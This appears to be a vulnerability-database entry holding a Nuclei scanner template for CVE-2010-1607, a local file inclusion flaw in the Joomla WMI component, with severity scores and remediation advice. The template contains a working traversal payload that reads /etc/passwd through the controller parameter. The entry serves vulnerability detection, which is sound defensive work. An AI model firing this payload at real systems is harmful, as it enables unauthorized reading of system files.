Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1607
HistorySep 07, 2021 - 11:13 a.m.

Joomla! Component WMI 1.5.0 - Local File Inclusion

2021-09-0711:13:12
ProjectDiscovery
github.com
7
cve
joomla
local file inclusion
exploit database
paysyspro

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.014

Percentile

86.6%

A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1607

info:
  name: Joomla! Component WMI 1.5.0 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
  remediation: |
    Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12316
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1607
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58032
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-1607
    cwe-id: CWE-22
    epss-score: 0.01726
    epss-percentile: 0.87848
    cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: paysyspro
    product: com_wmi
  tags: cve,cve2010,joomla,lfi,edb,paysyspro

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206a5567b36fff3d03faf770d2c865bf1b403a7b30e0032dfcb49e1553a84bbde4022100f26f6975831ceea1e81e0270b4d70b1ac8619c87910f88580b2df1a75323344c:922c64590222798bb761d5b6d8e72950

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.014

Percentile

86.6%

Related for NUCLEI:CVE-2010-1607